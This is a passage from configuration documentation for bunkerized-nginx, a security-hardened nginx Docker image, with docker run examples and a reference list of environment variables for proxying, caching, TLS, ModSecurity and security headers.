:</p>  <ul>  <li><code>SERVER_NAME</code> : define the FQDN of your webserver, this is mandatory for Let's Encrypt (<a href="http://www.yourdomain.com/" rel="nofollow" target="_blank" title="www.yourdomain.com">www.yourdomain.com</a> should point to your IP address)</li>  <li><code>AUTO_LETS_ENCRYPT</code> : enable automatic Let's Encrypt creation and renewal of certificates</li>  <li><code>REDIRECT_HTTP_TO_HTTPS</code> : enable HTTP to HTTPS redirection</li>  </ul>  <br><span><b>As a reverse proxy</b></span><br>  <div><pre><code>docker run -p 80:8080 \<br>           -e USE_REVERSE_PROXY=yes \<br>           -e REVERSE_PROXY_URL=/ \<br>           -e REVERSE_PROXY_HOST=http://myserver:8080 \<br>           bunkerity/bunkerized-nginx</code></pre></div>  <p>This is a simple reverse proxy to a unique application. If you have more than one application you can add more REVERSE_PROXY_URL/REVERSE_PROXY_HOST by appending a suffix number like this :</p>  <div><pre><code>docker run -p 80:8080 \<br>           -e USE_REVERSE_PROXY=yes \<br>           -e REVERSE_PROXY_URL_1=/app1/ \<br>           -e REVERSE_PROXY_HOST_1=http://myapp1:3000/ \<br>           -e REVERSE_PROXY_URL_2=/app2/ \<br>           -e REVERSE_PROXY_HOST_2=http://myapp2:3000/ \<br>           bunkerity/bunkerized-nginx</code></pre></div>  <br><span><b>Behind a reverse proxy</b></span><br>  <div><pre><code>docker run -p 80:8080 \<br>           -v /path/to/web/files:/www \<br>           -e PROXY_REAL_IP=yes \<br>           bunkerity/bunkerized-nginx</code></pre></div>  <p>The <code>PROXY_REAL_IP</code> environment variable, when set to <em>yes</em>, activates the <a href="https://nginx.org/en/docs/http/ngx_http_realip_module.html" rel="nofollow" target="_blank" title="ngx_http_realip_module">ngx_http_realip_module</a> to get the real client IP from the reverse proxy.</p>  <p>See <a href="https://github.com/bunkerity/bunkerized-nginx#reverse-proxy" rel="nofollow" target="_blank" title="this section">this section</a> if you need to tweak some values (trusted ip/network, header, ...).</p>  <br><span><b>Multisite</b></span><br>  <p>By default, bunkerized-nginx will only create one server block. When setting the <code>MULTISITE</code> environment variable to <em>yes</em>, one server block will be created for each host defined in the <code>SERVER_NAME</code> environment variable.<br>  You can set/override values for a specific server by prefixing the environment variable with one of the server name previously defined.</p>  <div><pre><code>docker run -p 80:8080 \<br>           -p 443:8443 \<br>           -v /where/to/save/certificates:/etc/letsencrypt \<br>           -e SERVER_NAME=app1.domain.com app2.domain.com \<br>           -e MULTISITE=yes \<br>           -e AUTO_LETS_ENCRYPT=yes \<br>           -e REDIRECT_HTTP_TO_HTTPS=yes \<br>           -e USE_REVERSE_PROXY=yes \<br>           -e app1.domain.com_PROXY_URL=/ \<br>           -e app1.domain.com_PROXY_HOST=http://myapp1:8000 \<br>           -e app2.domain.com_PROXY_URL=/ \<br>           -e app2.domain.com_PROXY_HOST=http://myapp2:8000 \<br>           bunkerity/bunkerized-nginx</code></pre></div>  <p>The <code>USE_REVERSE_PROXY</code> is a <em>global</em> variable that will be applied to each server block. Whereas the <code>app1.domain.com_*</code> and <code>app2.domain.com_*</code> will only be applied to the app1.domain.com and app2.domain.com server block respectively.</p>  <p>When serving files, the web root directory should contains subdirectories named as the servers defined in the <code>SERVER_NAME</code> environment variable. Here is an example :</p>  <div><pre><code>docker run -p 80:8080 \<br>           -p 443:8443 \<br>           -v /where/to/save/certificates:/etc/letsencrypt \<br>           -v /where/are/web/files:/www:ro \<br>           -e SERVER_NAME=app1.domain.com app2.domain.com \<br>           -e MULTISITE=yes \<br>           -e AUTO_LETS_ENCRYPT=yes \<br>           -e REDIRECT_HTTP_TO_HTTPS=yes \<br>           -e app1.domain.com_REMOTE_PHP=php1 \<br>           -e app1.domain.com_REMOTE_PHP_PATH=/app \<br>           -e app2.domain.com_REMOTE_PHP=php2 \<br>           -e app2.domain.com_REMOTE_PHP_PATH=/app \<br>           bunkerity/bunkerized-nginx</code></pre></div>  <p>The <em>/where/are/web/files</em> directory should have a structure like this :</p>  <div><pre><code>/where/are/web/files<br>├── app1.domain.com<br>│   └── index.php<br>│   └── ...<br>└── app2.domain.com<br>    └── index.php<br>    └── ...</code></pre></div>  <br><span><b>Antibot challenge</b></span><br>  <div><pre><code>docker run -p 80:8080 -v /path/to/web/files:/www -e USE_ANTIBOT=captcha bunkerity/bunkerized-nginx</code></pre></div>  <p>When <code>USE_ANTIBOT</code> is set to <em>captcha</em>, every users visiting your website must complete a captcha before accessing the pages. Others challenges are also available : <em>cookie</em>, <em>javascript</em> or <em>recaptcha</em> (more info <a href="https://github.com/bunkerity/bunkerized-nginx#antibot" rel="nofollow" target="_blank" title="here">here</a>).</p>  <br><span><b>Tutorials and examples</b></span><br>  <p>You will find some docker-compose.yml examples in the <a href="https://github.com/bunkerity/bunkerized-nginx/tree/master/examples" rel="nofollow" target="_blank" title="examples directory">examples directory</a> and tutorials about bunkerized-nginx in our <a href="https://www.bunkerity.com/category/bunkerized-nginx/" rel="nofollow" target="_blank" title="blog">blog</a>.</p>  <br><span><b>List of environment variables</b></span><br>  <br><span><b>nginx</b></span><br>  <br><b>Misc</b><br>  <p><code>MULTISITE</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>no</em><br>  Context : <em>global</em><br>  When set to <em>no</em>, only one server block will be generated. Otherwise one server per host defined in the <code>SERVER_NAME</code> environment variable will be generated.<br>  Any environment variable tagged as <em>multisite</em> context can be used for a specific server block with the following format : <em>host_VARIABLE=value</em>. If the variable is used without the host prefix it will be applied to all the server blocks (but still can be overriden).</p>  <p><code>SERVER_NAME</code><br>  Values : <em>&lt;first name&gt; &lt;second name&gt; ...</em><br>  Default value : <em><a href="http://www.bunkerity.com/" rel="nofollow" target="_blank" title="www.bunkerity.com">www.bunkerity.com</a></em><br>  Context : <em>global</em><br>  Sets the host names of the webserver separated with spaces. This must match the Host header sent by clients.<br>  Useful when used with <code>MULTISITE=yes</code> and/or <code>AUTO_LETSENCRYPT=yes</code> and/or <code>DISABLE_DEFAULT_SERVER=yes</code>.</p>  <p><code>MAX_CLIENT_SIZE</code><br>  Values : <em>0</em> | <em>Xm</em><br>  Default value : <em>10m</em><br>  Context : <em>global</em>, <em>multisite</em><br>  Sets the maximum body size before nginx returns a 413 error code.<br>  Setting to 0 means "infinite" body size.</p>  <p><code>ALLOWED_METHODS</code><br>  Values : <em>allowed HTTP methods separated with | char</em><br>  Default value : <em>GET|POST|HEAD</em><br>  Context : <em>global</em>, <em>multisite</em><br>  Only the HTTP methods listed here will be accepted by nginx. If not listed, nginx will close the connection.</p>  <p><code>DISABLE_DEFAULT_SERVER</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>no</em><br>  Context : <em>global</em>, <em>multisite</em><br>  If set to yes, nginx will only respond to HTTP request when the Host header match a FQDN specified in the <code>SERVER_NAME</code> environment variable.<br>  For example, it will close the connection if a bot access the site with direct ip.</p>  <p><code>SERVE_FILES</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>yes</em><br>  Context : <em>global</em>, <em>multisite</em><br>  If set to yes, nginx will serve files from /www directory within the container.<br>  A use case to not serving files is when you setup bunkerized-nginx as a reverse proxy via a custom configuration.</p>  <p><code>DNS_RESOLVERS</code><br>  Values : <em>&lt;two IP addresses separated with a space&gt;</em><br>  Default value : <em>127.0.0.11 8.8.8.8</em><br>  Context : <em>global</em><br>  The IP addresses of the DNS resolvers to use when performing DNS lookups.</p>  <p><code>ROOT_FOLDER</code><br>  Values : *&lt;any valid path to web files&gt;<br>  Default value : <em>/www</em><br>  Context : <em>global</em><br>  The default folder where nginx will search for web files. Don't change it unless you want to make your own image.</p>  <p><code>HTTP_PORT</code><br>  Values : <em>&lt;any valid port greater than 1024&gt;</em><br>  Default value : <em>8080</em><br>  Context : <em>global</em><br>  The HTTP port number used by nginx and certbot inside the container.</p>  <p><code>HTTPS_PORT</code><br>  Values : <em>&lt;any valid port greater than 1024&gt;</em><br>  Default value : <em>8443</em><br>  Context : <em>global</em><br>  The HTTPS port number used by nginx inside the container.</p>  <br><b>Information leak</b><br>  <p><code>SERVER_TOKENS</code><br>  Values : <em>on</em> | <em>off</em><br>  Default value : <em>off</em><br>  Context : <em>global</em><br>  If set to on, nginx will display server version in Server header and default error pages.</p>  <p><code>REMOVE_HEADERS</code><br>  Values : &lt;<em>list of headers separated with space</em>&gt;<br>  Default value : <em>Server X-Powered-By X-AspNet-Version X-AspNetMvc-Version</em><br>  Context : <em>global</em>, <em>multisite</em><br>  List of header to remove when sending responses to clients.</p>  <br><b>Custom error pages</b><br>  <p><code>ERROR_XXX</code><br>  Values : <em>&lt;relative path to the error page&gt;</em><br>  Default value :<br>  Context : <em>global</em>, <em>multisite</em><br>  Use this kind of environment variable to define custom error page depending on the HTTP error code. Replace XXX with HTTP code.<br>  For example : <code>ERROR_404=/404.html</code> means the /404.html page will be displayed when 404 code is generated. The path is relative to the root web folder.</p>  <br><b>HTTP basic authentication</b><br>  <p><code>USE_AUTH_BASIC</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>no</em><br>  Context : <em>global</em>, <em>multisite</em><br>  If set to yes, enables HTTP <a href="https://www.kitploit.com/search/label/Basic%20Authentication" target="_blank" title="basic authentication">basic authentication</a> at the location <code>AUTH_BASIC_LOCATION</code> with user <code>AUTH_BASIC_USER</code> and password <code>AUTH_BASIC_PASSWORD</code>.</p>  <p><code>AUTH_BASIC_LOCATION</code><br>  Values : <em>sitewide</em> | <em>/somedir</em> | <em>&lt;any valid location&gt;</em><br>  Default value : <em>sitewide</em><br>  Context : <em>global</em>, <em>multisite</em><br>  The location to restrict when <code>USE_AUTH_BASIC</code> is set to <em>yes</em>. If the special value <em>sitewide</em> is used then auth basic will be set at server level outside any location context.</p>  <p><code>AUTH_BASIC_USER</code><br>  Values : <em>&lt;any valid username&gt;</em><br>  Default value : <em>changeme</em><br>  Context : <em>global</em>, <em>multisite</em><br>  The username allowed to access <code>AUTH_BASIC_LOCATION</code> when <code>USE_AUTH_BASIC</code> is set to yes.</p>  <p><code>AUTH_BASIC_PASSWORD</code><br>  Values : <em>&lt;any valid password&gt;</em><br>  Default value : <em>changeme</em><br>  Context : <em>global</em>, <em>multisite</em><br>  The password of <code>AUTH_BASIC_USER</code> when <code>USE_AUTH_BASIC</code> is set to yes.</p>  <p><code>AUTH_BASIC_TEXT</code><br>  Values : <em>&lt;any valid text&gt;</em><br>  Default value : <em>Restricted area</em><br>  Context : <em>global</em>, <em>multisite</em><br>  The text displayed inside the login prompt when <code>USE_AUTH_BASIC</code> is set to yes.</p>  <br><b>Reverse proxy</b><br>  <p><code>USE_REVERSE_PROXY</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>no</em><br>  Context : <em>global</em>, <em>multisite</em><br>  Set this environment variable to <em>yes</em> if you want to use bunkerized-nginx as a reverse proxy.</p>  <p><code>REVERSE_PROXY_URL</code><br>  Values : &lt;<em>any valid location path</em>&gt;<br>  Default value :<br>  Context : <em>global</em>, <em>multisite</em><br>  Only valid when <code>USE_REVERSE_PROXY</code> is set to <em>yes</em>. Let's you define the location path to match when acting as a reverse proxy.<br>  You can set multiple url/host by adding a suffix number to the variable name like this : <code>REVERSE_PROXY_URL_1</code>, <code>REVERSE_PROXY_URL_2</code>, <code>REVERSE_PROXY_URL_3</code>, ...</p>  <p><code>REVERSE_PROXY_HOST</code><br>  Values : &lt;<em>any valid proxy_pass value</em>&gt;<br>  Default value :<br>  Context : <em>global</em>, <em>multisite</em><br>  Only valid when <code>USE_REVERSE_PROXY</code> is set to <em>yes</em>. Let's you define the proxy_pass destination to use when acting as a reverse proxy.<br>  You can set multiple url/host by adding a suffix number to the variable name like this : <code>REVERSE_PROXY_HOST_1</code>, <code>REVERSE_PROXY_HOST_2</code>, <code>REVERSE_PROXY_HOST_3</code>, ...</p>  <p><code>PROXY_REAL_IP</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>no</em><br>  Context : <em>global</em>, <em>multisite</em><br>  Set this environment variable to <em>yes</em> if you're using bunkerized-nginx behind a reverse proxy. This means you will see the real client address instead of the proxy one inside your logs. Modsecurity, fail2ban and others security tools will also then work correctly.</p>  <p><code>PROXY_REAL_IP_FROM</code><br>  Values : <em>&lt;list of trusted IP addresses and/or networks separated with spaces&gt;</em><br>  Default value : <em>192.168.0.0/16 172.16.0.0/12 10.0.0.0/8</em><br>  Context : <em>global</em>, <em>multisite</em><br>  When <code>PROXY_REAL_IP</code> is set to <em>yes</em>, lets you define the trusted IPs/networks allowed to send the correct client address.</p>  <p><code>PROXY_REAL_IP_HEADER</code><br>  Values : <em>X-Forwarded-For</em> | <em>X-Real-IP</em> | <em>custom header</em><br>  Default value : <em>X-Forwarded-For</em><br>  Context : <em>global</em>, <em>multisite</em><br>  When <code>PROXY_REAL_IP</code> is set to <em>yes</em>, lets you define the header that contains the real client IP address.</p>  <p><code>PROXY_REAL_IP_RECURSIVE</code><br>  Values : <em>on</em> | <em>off</em><br>  Default value : <em>on</em><br>  Context : <em>global</em>, <em>multisite</em><br>  When <code>PROXY_REAL_IP</code> is set to <em>yes</em>, setting this to <em>on</em> avoid spoofing attacks using the header defined in <code>PROXY_REAL_IP_HEADER</code>.</p>  <br><b>Compression</b><br>  <p><code>USE_GZIP</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>no</em><br>  Context : <em>global</em>, <em>multisite</em><br>  When set to <em>yes</em>, nginx will use the gzip algorithm to compress responses sent to clients.</p>  <p><code>GZIP_COMP_LEVEL</code><br>  Values : &lt;<em>any integer between 1 and 9</em>&gt;<br>  Default value : <em>5</em><br>  Context : <em>global</em>, <em>multisite</em><br>  The gzip compression level to use when <code>USE_GZIP</code> is set to <em>yes</em>.</p>  <p><code>GZIP_MIN_LENGTH</code><br>  Values : &lt;<em>any positive integer</em>&gt;<br>  Default value : <em>1000</em><br>  Context : <em>global</em>, <em>multisite</em><br>  The minimum size (in bytes) of a response required to compress when <code>USE_GZIP</code> is set to <em>yes</em>.</p>  <p><code>GZIP_TYPES</code><br>  Values : &lt;<em>list of mime types separated with space</em>&gt;<br>  Default value : <em>application/atom+xml application/javascript application/json application/rss+xml application/vnd.ms-fontobject application/x-font-opentype application/x-font-truetype application/x-font-ttf application/x-javascript application/xhtml+xml application/xml font/eot font/opentype font/otf font/truetype image/svg+xml image/vnd.microsoft.icon image/x-icon image/x-win-bitmap text/css text/javascript text/plain text/xml</em><br>  Context : <em>global</em>, <em>multisite</em><br>  List of response MIME type required to compress when <code>USE_GZIP</code> is set to <em>yes</em>.</p>  <p><code>USE_BROTLI</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>no</em><br>  Context : <em>global</em>, <em>multisite</em><br>  When set to <em>yes</em>, nginx will use the brotli algorithm to compress responses sent to clients.</p>  <p><code>BROTLI_COMP_LEVEL</code><br>  Values : &lt;<em>any integer between 1 and 9</em>&gt;<br>  Default value : <em>5</em><br>  Context : <em>global</em>, <em>multisite</em><br>  The brotli compression level to use when <code>USE_BROTLI</code> is set to <em>yes</em>.</p>  <p><code>BROTLI_MIN_LENGTH</code><br>  Values : &lt;<em>any positive integer</em>&gt;<br>  Default value : <em>1000</em><br>  Context : <em>global</em>, <em>multisite</em><br>  The minimum size (in bytes) of a response required to compress when <code>USE_BROTLI</code> is set to <em>yes</em>.</p>  <p><code>BROTLI_TYPES</code><br>  Values : &lt;<em>list of mime types separated with space</em>&gt;<br>  Default value : <em>application/atom+xml application/javascript application/json application/rss+xml application/vnd.ms-fontobject application/x-font-opentype application/x-font-truetype application/x-font-ttf application/x-javascript application/xhtml+xml application/xml font/eot font/opentype font/otf font/truetype image/svg+xml image/vnd.microsoft.icon image/x-icon image/x-win-bitmap text/css text/javascript text/plain text/xml</em><br>  Context : <em>global</em>, <em>multisite</em><br>  List of response MIME type required to compress when <code>USE_BROTLI</code> is set to <em>yes</em>.</p>  <br><b>Cache</b><br>  <p><code>USE_CLIENT_CACHE</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>no</em><br>  Context : <em>global</em>, <em>multisite</em><br>  When set to <em>yes</em>, clients will be told to cache some files locally.</p>  <p><code>CLIENT_CACHE_EXTENSIONS</code><br>  Values : &lt;<em>list of extensions separated with |</em>&gt;<br>  Default value : <em>jpg|jpeg|png|bmp|ico|svg|tif|css|js|otf|ttf|eot|woff|woff2</em><br>  Context : <em>global</em>, <em>multisite</em><br>  List of file extensions that clients should cache when <code>USE_CLIENT_CACHE</code> is set to <em>yes</em>.</p>  <p><code>CLIENT_CACHE_CONTROL</code><br>  Values : &lt;<em>Cache-Control header value</em>&gt;<br>  Default value : <em>public, max-age=15552000</em><br>  Context : <em>global</em>, <em>multisite</em><br>  Content of the <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Cache-Control" rel="nofollow" target="_blank" title="Cache-Control">Cache-Control</a> header to send when <code>USE_CLIENT_CACHE</code> is set to <em>yes</em>.</p>  <p><code>CLIENT_CACHE_ETAG</code><br>  Values : <em>on</em> | <em>off</em><br>  Default value : <em>on</em><br>  Context : <em>global</em>, <em>multisite</em><br>  Whether or not nginx will send the <a href="https://en.wikipedia.org/wiki/HTTP_ETag" rel="nofollow" target="_blank" title="ETag">ETag</a> header when <code>USE_CLIENT_CACHE</code> is set to <em>yes</em>.</p>  <p><code>USE_OPEN_FILE_CACHE</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>no</em><br>  Context : <em>global</em>, <em>multisite</em><br>  When set to <em>yes</em>, nginx will cache open fd, existence of directories, ... See <a href="http://nginx.org/en/docs/http/ngx_http_core_module.html#open_file_cache" rel="nofollow" target="_blank" title="open_file_cache">open_file_cache</a>.</p>  <p><code>OPEN_FILE_CACHE</code><br>  Values : &lt;<em>any valid open_file_cache parameters</em>&gt;<br>  Default value : <em>max=1000 inactive=20s</em><br>  Context : <em>global</em>, <em>multisite</em><br>  Parameters to use with open_file_cache when <code>USE_OPEN_FILE_CACHE</code> is set to <em>yes</em>.</p>  <p><code>OPEN_FILE_CACHE_ERRORS</code><br>  Values : <em>on</em> | <em>off</em><br>  Default value : <em>on</em><br>  Context : <em>global</em>, <em>multisite</em><br>  Whether or not nginx should cache file lookup errors when <code>USE_OPEN_FILE_CACHE</code> is set to <em>yes</em>.</p>  <p><code>OPEN_FILE_CACHE_MIN_USES</code><br>  Values : &lt;*any valid integer *&gt;<br>  Default value : <em>2</em><br>  Context : <em>global</em>, <em>multisite</em><br>  The minimum number of file accesses required to cache the fd when <code>USE_OPEN_FILE_CACHE</code> is set to <em>yes</em>.</p>  <p><code>OPEN_FILE_CACHE_VALID</code><br>  Values : &lt;<em>any time value like Xs, Xm, Xh, ...</em>&gt;<br>  Default value : <em>30s</em><br>  Context : <em>global</em>, <em>multisite</em><br>  The time after which cached elements should be validated when <code>USE_OPEN_FILE_CACHE</code> is set to <em>yes</em>.</p>  <p><code>USE_PROXY_CACHE</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>no</em><br>  Context : <em>global</em>, <em>multisite</em><br>  When set to <em>yes</em>, nginx will cache responses from proxied applications. See <a href="http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_cache" rel="nofollow" target="_blank" title="proxy_cache">proxy_cache</a>.</p>  <p><code>PROXY_CACHE_PATH_ZONE_SIZE</code><br>  Values : &lt;<em>any valid size like Xk, Xm, Xg, ...</em>&gt;<br>  Default value : <em>10m</em><br>  Context : <em>global</em>, <em>multisite</em><br>  Maximum size of cached metadata when <code>USE_PROXY_CACHE</code> is set to <em>yes</em>.</p>  <p><code>PROXY_CACHE_PATH_PARAMS</code><br>  Values : &lt;<em>any valid parameters to proxy_cache_path directive</em>&gt;<br>  Default value : <em>max_size=100m</em><br>  Context : <em>global</em>, <em>multisite</em><br>  Parameters to use for <a href="http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_cache_path" rel="nofollow" target="_blank" title="proxy_cache_path">proxy_cache_path</a> directive when <code>USE_PROXY_CACHE</code> is set to <em>yes</em>.</p>  <p><code>PROXY_CACHE_METHODS</code><br>  Values : &lt;<em>list of HTTP methods separated with space</em>&gt;<br>  Default value : <em>GET HEAD</em><br>  Context : <em>global</em>, <em>multisite</em><br>  The HTTP methods that should trigger a cache operation when <code>USE_PROXY_CACHE</code> is set to <em>yes</em>.</p>  <p><code>PROXY_CACHE_MIN_USES</code><br>  Values : &lt;<em>any positive integer</em>&gt;<br>  Default value : <em>2</em><br>  Context : <em>global</em>, <em>multisite</em><br>  The minimum number of requests before the response is cached when <code>USE_PROXY_CACHE</code> is set to <em>yes</em>.</p>  <p><code>PROXY_CACHE_KEY</code><br>  Values : &lt;<em>list of variables</em>&gt;<br>  Default value : <em>$scheme$host$request_uri</em><br>  Context : <em>global</em>, <em>multisite</em><br>  The key used to uniquely identify a cached response when <code>USE_PROXY_CACHE</code> is set to <em>yes</em>.</p>  <p><code>PROXY_CACHE_VALID</code><br>  Values : &lt;<em>status=time list separated with space</em>&gt;<br>  Default value : <em>200=10m 301=10m 301=1h any=1m</em><br>  Context : <em>global</em>, <em>multisite</em><br>  Define the caching time depending on the HTTP status code (list of status=time separated with space) when <code>USE_PROXY_CACHE</code> is set to <em>yes</em>.</p>  <p><code>PROXY_NO_CACHE</code><br>  Values : &lt;<em>list of variables</em>&gt;<br>  Default value : <em>$http_authorization</em><br>  Context : <em>global</em>, <em>multisite</em><br>  Conditions that must be met to disable caching of the response when <code>USE_PROXY_CACHE</code> is set to <em>yes</em>.</p>  <p><code>PROXY_CACHE_BYPASS</code><br>  Values : &lt;<em>list of variables</em>&gt;  Default value : <em>$http_authorization</em><br>  Context : <em>global</em>, <em>multisite</em>  Conditions that must be met to bypass the cache when <code>USE_PROXY_CACHE</code> is set to <em>yes</em>.</p>  <br><span><b>HTTPS</b></span><br>  <br><b>Let's Encrypt</b><br>  <p><code>AUTO_LETS_ENCRYPT</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>no</em><br>  Context : <em>global</em><br>  If set to yes, automatic certificate generation and renewal will be setup through Let's Encrypt. This will enable HTTPS on your website for free.<br>  You will need to redirect the 80 port to 8080 port inside container and also set the <code>SERVER_NAME</code> environment variable.</p>  <br><b>HTTP</b><br>  <p><code>LISTEN_HTTP</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>yes</em><br>  Context : <em>global</em>, <em>multisite</em><br>  If set to no, nginx will not in listen on HTTP (port 80).<br>  Useful if you only want HTTPS access to your website.</p>  <p><code>REDIRECT_HTTP_TO_HTTPS</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>no</em><br>  Context : <em>global</em>, <em>multisite</em><br>  If set to yes, nginx will redirect all HTTP requests to HTTPS.</p>  <br><b>Custom certificate</b><br>  <p><code>USE_CUSTOM_HTTPS</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>no</em><br>  Context : <em>global</em><br>  If set to yes, HTTPS will be enabled with certificate/key of your choice.</p>  <p><code>CUSTOM_HTTPS_CERT</code><br>  Values : <em>&lt;any valid path inside the container&gt;</em><br>  Default value :<br>  Context : <em>global</em><br>  Full path of the certificate file to use when <code>USE_CUSTOM_HTTPS</code> is set to yes.</p>  <p><code>CUSTOM_HTTPS_KEY</code><br>  Values : <em>&lt;any valid path inside the container&gt;</em><br>  Default value :<br>  Context : <em>global</em><br>  Full path of the key file to use when <code>USE_CUSTOM_HTTPS</code> is set to yes.</p>  <br><b>Self-signed certificate</b><br>  <p><code>GENERATE_SELF_SIGNED_SSL</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>no</em><br>  Context : <em>global</em><br>  If set to yes, HTTPS will be enabled with a container generated self-signed certificate.</p>  <p><code>SELF_SIGNED_SSL_EXPIRY</code><br>  Values : <em>integer</em><br>  Default value : <em>365</em> (1 year)<br>  Context : <em>global</em><br>  Needs <code>GENERATE_SELF_SIGNED_SSL</code> to work.  Sets the expiry date for the self generated certificate.</p>  <p><code>SELF_SIGNED_SSL_COUNTRY</code><br>  Values : <em>text</em><br>  Default value : <em>Switzerland</em><br>  Context : <em>global</em><br>  Needs <code>GENERATE_SELF_SIGNED_SSL</code> to work.  Sets the country for the self generated certificate.</p>  <p><code>SELF_SIGNED_SSL_STATE</code><br>  Values : <em>text</em><br>  Default value : <em>Switzerland</em><br>  Context : <em>global</em><br>  Needs <code>GENERATE_SELF_SIGNED_SSL</code> to work.  Sets the state for the self generated certificate.</p>  <p><code>SELF_SIGNED_SSL_CITY</code><br>  Values : <em>text</em><br>  Default value : <em>Bern</em><br>  Context : <em>global</em><br>  Needs <code>GENERATE_SELF_SIGNED_SSL</code> to work.  Sets the city for the self generated certificate.</p>  <p><code>SELF_SIGNED_SSL_ORG</code><br>  Values : <em>text</em><br>  Default value : <em>AcmeInc</em><br>  Context : <em>global</em><br>  Needs <code>GENERATE_SELF_SIGNED_SSL</code> to work.  Sets the organisation name for the self generated certificate.</p>  <p><code>SELF_SIGNED_SSL_OU</code><br>  Values : <em>text</em><br>  Default value : <em>IT</em><br>  Context : <em>global</em><br>  Needs <code>GENERATE_SELF_SIGNED_SSL</code> to work.  Sets the organisitional unit for the self generated certificate.</p>  <p><code>SELF_SIGNED_SSL_CN</code><br>  Values : <em>text</em><br>  Default value : <em>bunkerity-nginx</em><br>  Context : <em>global</em><br>  Needs <code>GENERATE_SELF_SIGNED_SSL</code> to work.  Sets the CN server name for the self generated certificate.</p>  <br><b>Misc</b><br>  <p><code>HTTP2</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>yes</em><br>  Context : <em>global</em>, <em>multisite</em><br>  If set to yes, nginx will use HTTP2 protocol when HTTPS is enabled.</p>  <p><code>HTTPS_PROTOCOLS</code><br>  Values : <em>TLSv1.2</em> | <em>TLSv1.3</em> | <em>TLSv1.2 TLSv1.3</em><br>  Default value : <em>TLSv1.2 TLSv1.3</em><br>  Context : <em>global</em>, <em>multisite</em><br>  The supported version of TLS. We recommend the default value <em>TLSv1.2 TLSv1.3</em> for compatibility reasons.</p>  <br><span><b>ModSecurity</b></span><br>  <p><code>USE_MODSECURITY</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>yes</em><br>  Context : <em>global</em>, <em>multisite</em><br>  If set to yes, the ModSecurity WAF will be enabled.<br>  You can include custom rules by adding .conf files into the /modsec-confs/ directory inside the container (i.e : through a volume).</p>  <p><code>USE_MODSECURITY_CRS</code><br>  Values : <em>yes</em> | <em>no</em><br>  Default value : <em>yes</em><br>  Context : <em>global</em>, <em>multisite</em><br>  If set to yes, the <a href="https://coreruleset.org/" rel="nofollow" target="_blank" title="OWASP ModSecurity Core Rule Set">OWASP ModSecurity Core Rule Set</a> will be used. It provides generic rules to detect common web attacks.<br>  You can customize the CRS (i.e. : add WordPress exclusions) by adding custom .conf files into the /modsec-crs-confs/ directory inside the container (i.e : through a volume). Files inside this directory are included before the CRS rules. If you need to tweak (i.e. : SecRuleUpdateTargetById) put .conf files inside the /modsec-confs/ which is included after the CRS rules.</p>  <br><span><b>Security headers</b></span><br>  <p><code>X_FRAME_OPTIONS</code><br>  Values : <em>DENY</em> | <em>SAMEORIGIN</em> | <em>ALLOW-FROM <a href="https://www.website.net/" rel="nofollow" target="_blank" title="https://www.website.net">https://www.website.net</a></em> | <em>ALLOWALL</em><br>  Default value : <em>DENY</em><br>  Context : <em>global</em>, <em>multisite</em><br>  Policy to be used when the site is displayed through iframe. Can be used to mitigate <a href="https://www.kitploit.com/search/label/ClickJacking" target="_blank" title="clickjacking">clickjacking</a> attacks.  More info <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options" rel="nofollow" target="_blank" title="here">here</a>.</p>  <p><code>X_XSS_PROTECTION</code><br>  Values : <em>0</em> | <em>1</em> | <em>1; mode=block</em><br>  Default value : <em>1; mode=block</em><br>  Context : <em>global</em>, <em>multisite</em><br>  Policy to be used when XSS is detected by the browser. Only works with Internet Explorer.<br>  More info <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-XSS-Protection" rel="nofollow" target="_blank" title="here">here</a>.</p>  <p><code>X_CONTENT_TYPE_OPTIONS</code><br>  Values : <em>nosniff</em><br>  Default value : <em>nosniff</em><br>  Context : <em>global</em>, <em>multisite</em><br>  Tells the browser to be strict about MIME type.<br>  More info <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Content-Type-Options" rel="nofollow" target="_blank" title="here">here</a>.</p>  <p><code>REFERRER_POLICY</code><br>  Values : <em>no-referrer</em> | <em>no-referrer-when-downgrade</em> | <em>origin</em> | <em>origin-when-cross-origin</em> | <em>same-origin</em> | <em>strict-origin</em> | <em>strict-origin-when-cross-origin</em> | <em>unsafe-url</em><br>  Default value : <em>no-referrer</em><br>  Context : <em>global</em>, <em>multisite</em><br>  Policy to be used for the Referer header.<br>  More info <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referrer-Policy" rel="nofollow" target="_blank" title="here">here</a>.</p>  <p><code>FEATURE_POLICY</code><br>  Values : <em>&lt;directive&gt; &lt;allow list&gt;</em><br>  Default value : <em>accelerometer 'none'; ambient-light-sensor 'none'; autoplay 'none'; camera 'none'; display-capture 'none'; document-domain 'none'; encrypted-media 'none'; fullscreen 'none'; <a href="https://www.kitploit.com/search/label/Geolocation" target="_blank" title="geolocation">geolocation</a> 'none'; gyroscope 'none'; magnetometer 'none'; microphone 'none'; midi 'none'; payment 'none'; picture-in-picture 'none'; speaker 'none'; sync-xhr 'none'; usb 'none'; vibrate 'none'; vr 'none'</em><br>  Context : <em>global</em>, <em>multisite</em><br>  Tells the browser which features can be used on the website.<br>  More info <a 